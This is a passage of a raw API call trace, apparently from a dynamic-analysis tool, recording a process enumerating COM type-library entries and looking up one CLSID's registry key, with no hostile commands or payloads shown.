ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf530, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.806] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce248, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.806] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce248) returned 0x0 [0030.806] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf1c0, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.806] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf1c0) returned 0x0 [0030.806] IUnknown:Release (This=0xb4ce248) returned 0x1 [0030.806] IUnknown:Release (This=0xb4cf1c0) returned 0x1 [0030.806] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf530) returned 0x0 [0030.806] IUnknown:Release (This=0xb4cf530) returned 0x1 [0030.806] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x7e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf588) returned 0x0 [0030.806] IUnknown:Release (This=0x780d3e8) returned 0x2 [0030.806] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf588, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.806] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce2f8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.806] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce2f8) returned 0x0 [0030.806] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf218, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.806] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf218) returned 0x0 [0030.806] IUnknown:Release (This=0xb4ce2f8) returned 0x1 [0030.806] IUnknown:Release (This=0xb4cf218) returned 0x1 [0030.806] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf588) returned 0x0 [0030.806] IUnknown:Release (This=0xb4cf588) returned 0x1 [0030.806] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x7f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf5e0) returned 0x0 [0030.807] IUnknown:Release (This=0x780d448) returned 0x2 [0030.807] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf5e0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.807] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce3a8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.807] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce3a8) returned 0x0 [0030.807] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf270, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.807] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf270) returned 0x0 [0030.807] IUnknown:Release (This=0xb4ce3a8) returned 0x1 [0030.807] IUnknown:Release (This=0xb4cf270) returned 0x1 [0030.807] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf5e0) returned 0x0 [0030.807] IUnknown:Release (This=0xb4cf5e0) returned 0x1 [0030.807] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x80, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf638) returned 0x0 [0030.807] IUnknown:Release (This=0x780d4a8) returned 0x2 [0030.807] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf638, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.808] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce458, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.808] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce458) returned 0x0 [0030.808] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf2c8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.808] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf2c8) returned 0x0 [0030.808] IUnknown:Release (This=0xb4ce458) returned 0x1 [0030.808] IUnknown:Release (This=0xb4cf2c8) returned 0x1 [0030.808] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf638) returned 0x0 [0030.808] IUnknown:Release (This=0xb4cf638) returned 0x1 [0030.808] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x81, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf690) returned 0x0 [0030.808] IUnknown:Release (This=0x780d508) returned 0x2 [0030.808] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf690, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.808] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce508, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.808] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce508) returned 0x0 [0030.808] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf320, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.808] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf320) returned 0x0 [0030.808] IUnknown:Release (This=0xb4ce508) returned 0x1 [0030.808] IUnknown:Release (This=0xb4cf320) returned 0x1 [0030.808] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf690) returned 0x0 [0030.808] IUnknown:Release (This=0xb4cf690) returned 0x1 [0030.808] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x82, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf6e8) returned 0x0 [0030.808] IUnknown:Release (This=0x780d568) returned 0x2 [0030.808] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf6e8, ppTypeAttr=0x2e6a20, pDummy=0x15 | out: ppTypeAttr=0x2e6a20, pDummy=0x15) returned 0x0 [0030.809] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce5b8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.809] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce5b8) returned 0x0 [0030.809] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf378, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.809] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf378) returned 0x0 [0030.809] IUnknown:Release (This=0xb4ce5b8) returned 0x1 [0030.809] IUnknown:Release (This=0xb4cf378) returned 0x1 [0030.809] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf6e8) returned 0x0 [0030.809] IUnknown:Release (This=0xb4cf6e8) returned 0x1 [0030.809] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x83, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf740) returned 0x0 [0030.809] IUnknown:Release (This=0x780d5c8) returned 0x2 [0030.809] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf740, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.809] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce668, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.809] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce668) returned 0x0 [0030.809] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf3d0, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.809] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf3d0) returned 0x0 [0030.809] IUnknown:Release (This=0xb4ce668) returned 0x1 [0030.809] IUnknown:Release (This=0xb4cf3d0) returned 0x1 [0030.809] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf740) returned 0x0 [0030.809] IUnknown:Release (This=0xb4cf740) returned 0x1 [0030.809] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x84, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf798) returned 0x0 [0030.809] IUnknown:Release (This=0x780d628) returned 0x2 [0030.809] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf798, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.810] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce718, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.810] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce718) returned 0x0 [0030.810] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf428, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.810] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf428) returned 0x0 [0030.810] IUnknown:Release (This=0xb4ce718) returned 0x1 [0030.810] IUnknown:Release (This=0xb4cf428) returned 0x1 [0030.810] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf798) returned 0x0 [0030.810] IUnknown:Release (This=0xb4cf798) returned 0x1 [0030.810] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x85, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf7f0) returned 0x0 [0030.810] IUnknown:Release (This=0x780d688) returned 0x2 [0030.810] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf7f0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.810] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce7c8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.810] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce7c8) returned 0x0 [0030.810] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf480, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.810] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf480) returned 0x0 [0030.810] IUnknown:Release (This=0xb4ce7c8) returned 0x1 [0030.810] IUnknown:Release (This=0xb4cf480) returned 0x1 [0030.810] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf7f0) returned 0x0 [0030.810] IUnknown:Release (This=0xb4cf7f0) returned 0x1 [0030.810] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x86, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf848) returned 0x0 [0030.810] IUnknown:Release (This=0x780d6e8) returned 0x2 [0030.810] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf848, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.811] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce878, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.811] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce878) returned 0x0 [0030.811] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf4d8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.811] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf4d8) returned 0x0 [0030.811] IUnknown:Release (This=0xb4ce878) returned 0x1 [0030.811] IUnknown:Release (This=0xb4cf4d8) returned 0x1 [0030.811] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf848) returned 0x0 [0030.811] IUnknown:Release (This=0xb4cf848) returned 0x1 [0030.811] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x87, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf8a0) returned 0x0 [0030.811] IUnknown:Release (This=0x780d748) returned 0x2 [0030.811] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf8a0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.811] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf8a0) returned 0x0 [0030.811] IUnknown:Release (This=0xb4cf8a0) returned 0x1 [0030.811] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x88, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cf8f8) returned 0x0 [0030.811] IUnknown:Release (This=0x780d808) returned 0x2 [0030.811] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf8f8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.811] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf8f8) returned 0x0 [0030.811] IUnknown:Release (This=0xb4cf8f8) returned 0x1 [0030.811] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x89, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780d868) returned 0x0 [0030.811] IUnknown:Release (This=0x780d928) returned 0x2 [0030.812] ITypeInfo:RemoteGetTypeAttr (in: This=0x780d868, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.812] ITypeInfo:LocalReleaseTypeAttr (This=0x780d868) returned 0x0 [0030.812] IUnknown:Release (This=0x780d868) returned 0x1 [0030.812] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x8a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780d988) returned 0x0 [0030.812] IUnknown:Release (This=0x780da48) returned 0x2 [0030.812] ITypeInfo:RemoteGetTypeAttr (in: This=0x780d988, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.812] ITypeInfo:LocalReleaseTypeAttr (This=0x780d988) returned 0x0 [0030.812] IUnknown:Release (This=0x780d988) returned 0x1 [0030.812] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x8b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780daa8) returned 0x0 [0030.812] IUnknown:Release (This=0x780db08) returned 0x2 [0030.812] ITypeInfo:RemoteGetTypeAttr (in: This=0x780daa8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.812] ITypeInfo:LocalReleaseTypeAttr (This=0x780daa8) returned 0x0 [0030.812] IUnknown:Release (This=0x780daa8) returned 0x1 [0030.812] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x8c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780db68) returned 0x0 [0030.812] IUnknown:Release (This=0x780dbc8) returned 0x2 [0030.812] ITypeInfo:RemoteGetTypeAttr (in: This=0x780db68, ppTypeAttr=0x2e6a20, pDummy=0x10 | out: ppTypeAttr=0x2e6a20, pDummy=0x10) returned 0x0 [0030.812] ITypeInfo:RemoteGetTypeAttr (in: This=0x780d988, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.812] ITypeInfo:LocalReleaseTypeAttr (This=0x780d988) returned 0x0 [0030.812] ITypeInfo:RemoteGetTypeAttr (in: This=0x780daa8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.812] ITypeInfo:LocalReleaseTypeAttr (This=0x780daa8) returned 0x0 [0030.812] IUnknown:Release (This=0x780d988) returned 0x1 [0030.812] IUnknown:Release (This=0x780daa8) returned 0x1 [0030.812] ITypeInfo:LocalReleaseTypeAttr (This=0x780db68) returned 0x0 [0030.813] IUnknown:Release (This=0x780db68) returned 0x1 [0030.813] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x8d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780dc28) returned 0x0 [0030.813] IUnknown:Release (This=0x780dc88) returned 0x2 [0030.813] ITypeInfo:RemoteGetTypeAttr (in: This=0x780dc28, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.813] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.813] StringFromGUID2 (in: rguid=0xb46ecb8*(Data1=0x5cef5610, Data2=0x713d, Data3=0x11ce, Data4=([0]=0x80, [1]=0xc9, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x61, [6]=0x10, [7]=0x80)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{5CEF5610-713D-11CE-80C9-00AA00611080}") returned 39 [0030.813] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{5CEF5610-713D-11CE-80C9-00AA00611080}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa3e) returned 0x0 [0030.813] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.813] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.813] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.813] ITypeInfo:LocalReleaseTypeAttr (This=0x780dc28) returned 0x0 [0030.813] IUnknown:Release (This=0x780dc28) returned 0x1 [0030.813] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x8e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780dce8) returned 0x0 [0030.814] IUnknown:Release (This=0x780de68) returned 0x2 [0030.814] ITypeInfo:RemoteGetTypeAttr (in: This=0x780dce8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.814] ITypeInfo:LocalReleaseTypeAttr (This=0x780dce8) returned 0x0 [0030.814] IUnknown:Release (This=0x780dce8) returned 0x1 [0030.814] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x8f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780dec8) returned 0x0 [0030.814] IUnknown:Release (This=0x780df28) returned 0x2 [0030.814] ITypeInfo:RemoteGetTypeAttr (in: This=0x780dec8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.814] ITypeInfo:LocalReleaseTypeAttr (This=0x780dec8) returned 0x0 [0030.814] IUnknown:Release (This=0x780dec8) returned 0x1 [0030.814] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x90, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780df88) returned 0x0 [0030.814] IUnknown:Release (This=0x780dfe8) returned 0x2 [0030.814] ITypeInfo:RemoteGetTypeAttr (in: This=0x780df88, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.814] ITypeInfo:LocalReleaseTypeAttr (This=0x780df88) returned 0x0 [0030.814] IUnknown:Release (This=0x780df88) returned 0x1 [0030.814] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x91, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e048) returned 0x0 [0030.814] IUnknown:Release (This=0x780e0a8) returned 0x2 [0030.814] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e048, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.814] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cda08, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.815] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cda08) returned 0x0 [0030.815] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cea88, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.815] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cea88) returned 0x0 [0030.815] IUnknown:Release (This=0xb4cda08) returned 0x1 [0030.815] IUnknown:Release (This=0xb4cea88) returned 0x1 [0030.815] ITypeInfo:LocalReleaseTypeAttr (This=0x780e048) returned 0x0 [0030.815] IUnknown:Release (This=0x780e048) returned 0x1 [0030.815] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x92, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e108) returned 0x0 [0030.815] IUnknown:Release (This=0x780e168) returned 0x2 [0030.815] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e108, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.815] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd900, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.815] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd900) returned 0x0 [0030.815] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce9d8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.815] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce9d8) returned 0x0 [0030.815] IUnknown:Release (This=0xb4cd900) returned 0x1 [0030.815] IUnknown:Release (This=0xb4ce9d8) returned 0x1 [0030.815] ITypeInfo:LocalReleaseTypeAttr (This=0x780e108) returned 0x0 [0030.815] IUnknown:Release (This=0x780e108) returned 0x1 [0030.815] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x93, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e1c8) returned 0x0 [0030.815] IUnknown:Release (This=0x780e228) returned 0x2 [0030.815] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e1c8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.815] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce198, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.816] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce198) returned 0x0 [0030.816] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf110, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.816] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf110) returned 0x0 [0030.816] IUnknown:Release (This=0xb4ce198) returned 0x1 [0030.816] IUnknown:Release (This=0xb4cf110) returned 0x1 [0030.816] ITypeInfo:LocalReleaseTypeAttr (This=0x780e1c8) returned 0x0 [0030.816] IUnknown:Release (This=0x780e1c8) returned 0x1 [0030.816] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x94, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e288) returned 0x0 [0030.816] IUnknown:Release (This=0x780e2e8) returned 0x2 [0030.816] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e288, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.816] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd850, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.816] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd850) returned 0x0 [0030.816] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce928, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.816] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce928) returned 0x0 [0030.816] IUnknown:Release (This=0xb4cd850) returned 0x1 [0030.816] IUnknown:Release (This=0xb4ce928) returned 0x1 [0030.816] ITypeInfo:LocalReleaseTypeAttr (This=0x780e288) returned 0x0 [0030.816] IUnknown:Release (This=0x780e288) returned 0x1 [0030.816] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x95, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e348) returned 0x0 [0030.816] IUnknown:Release (This=0x780e3a8) returned 0x2 [0030.816] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e348, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.816] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cde28, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.816] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cde28) returned 0x0 [0030.816] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cef00, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.817] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cef00) returned 0x0 [0030.817] IUnknown:Release (This=0xb4cde28) returned 0x1 [0030.817] IUnknown:Release (This=0xb4cef00) returned 0x1 [0030.817] ITypeInfo:LocalReleaseTypeAttr (This=0x780e348) returned 0x0 [0030.817] IUnknown:Release (This=0x780e348) returned 0x1 [0030.817] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x96, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e408) returned 0x0 [0030.817] IUnknown:Release (This=0x780e468) returned 0x2 [0030.817] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e408, ppTypeAttr=0x2e6a20, pDummy=0xb | out: ppTypeAttr=0x2e6a20, pDummy=0xb) returned 0x0 [0030.817] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce0e8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.817] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce0e8) returned 0x0 [0030.817] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf060, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.817] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf060) returned 0x0 [0030.817] IUnknown:Release (This=0xb4ce0e8) returned 0x1 [0030.817] IUnknown:Release (This=0xb4cf060) returned 0x1 [0030.817] ITypeInfo:LocalReleaseTypeAttr (This=0x780e408) returned 0x0 [0030.817] IUnknown:Release (This=0x780e408) returned 0x1 [0030.817] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x97, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e4c8) returned 0x0 [0030.817] IUnknown:Release (This=0x780e528) returned 0x2 [0030.817] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e4c8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.817] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce038, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.817] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce038) returned 0x0 [0030.817] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cefb0, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.818] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cefb0) returned 0x0 [0030.818] IUnknown:Release (This=0xb4ce038) returned 0x1 [0030.818] IUnknown:Release (This=0xb4cefb0) returned 0x1 [0030.818] ITypeInfo:LocalReleaseTypeAttr (This=0x780e4c8) returned 0x0 [0030.818] IUnknown:Release (This=0x780e4c8) returned 0x1 [0030.818] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x98, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e588) returned 0x0 [0030.818] IUnknown:Release (This=0x780e5e8) returned 0x2 [0030.818] 